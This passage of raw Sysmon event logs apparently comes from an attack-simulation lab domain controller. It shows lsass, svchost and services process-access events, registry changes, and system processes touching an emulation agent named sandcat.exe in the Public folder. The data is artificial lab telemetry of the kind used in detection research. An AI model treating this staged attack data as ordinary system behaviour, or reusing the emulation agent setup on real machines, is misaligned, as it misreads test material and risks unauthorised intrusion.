dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 10341000x80000000000000001174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.252{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:08.236{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.236{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:08.236{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.236{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:08.236{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.236{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:34:08.158{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\GuidBinary Data 12241200x80000000000000001161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-DeleteValue2021-01-18 13:34:08.158{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\Guid 10341000x80000000000000001160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.142{59A5CD1D-8E44-6005-0A00-00000000A301}8481136C:\Windows\system32\services.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.142{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:08.142{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.148{59A5CD1D-8E50-6005-2600-00000000A301}3040C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k smbsvcsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:08.142{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.142{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.142{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:08.142{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
13241300x80000000000000001152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:08.142{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 10341000x80000000000000001151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:07.174{59A5CD1D-8E46-6005-1100-00000000A301}11721400C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:07.158{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:05.799{59A5CD1D-8E47-6005-1C00-00000000A301}21642280C:\Windows\system32\conhost.exe{59A5CD1D-8E4D-6005-2500-00000000A301}2988C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:05.799{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E4D-6005-2500-00000000A301}2988C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
